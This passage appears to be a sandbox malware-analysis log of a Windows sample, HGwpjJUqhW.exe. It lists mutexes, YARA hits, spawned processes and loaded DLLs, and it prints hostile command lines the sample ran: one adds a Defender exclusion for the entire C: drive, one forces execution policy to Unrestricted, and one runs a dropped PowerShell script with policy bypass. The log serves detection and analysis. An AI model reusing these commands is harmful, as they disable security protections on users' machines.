                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile created: C:\Users\user\Desktop\LogsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeMutant created: \Sessions\1\BaseNamedObjects\XoreaxIncredibuild_hgwpjjuqhw_Mutex_user_WinSta0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeMutant created: \Sessions\1\BaseNamedObjects\Global\XoreaxIncredibuild_hgwpjjuqhw_Mutex
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeMutant created: \Sessions\1\BaseNamedObjects\Xoreax_LogMutex_hgwpjjuqhw
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeMutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xmlJump to behavior
                              Source: Yara matchFile source: HGwpjJUqhW.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.HGwpjJUqhW.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.HGwpjJUqhW.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.2089018871.0000000000403000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1671468672.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                              Source: HGwpjJUqhW.exeVirustotal: Detection: 12%
                              Source: HGwpjJUqhW.exeString found in binary or memory: -ADDCUSTOMCOLORBUTTON_CAP=Add to Custom Colors
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile read: C:\Users\user\Desktop\HGwpjJUqhW.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\HGwpjJUqhW.exe "C:\Users\user\Desktop\HGwpjJUqhW.exe"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: msvcp140.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: msvcp140.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: dxgi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: dinput8.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: inputhost.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: resourcepolicyclient.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: devenum.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: msdmo.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: avicap32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: msvfw32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
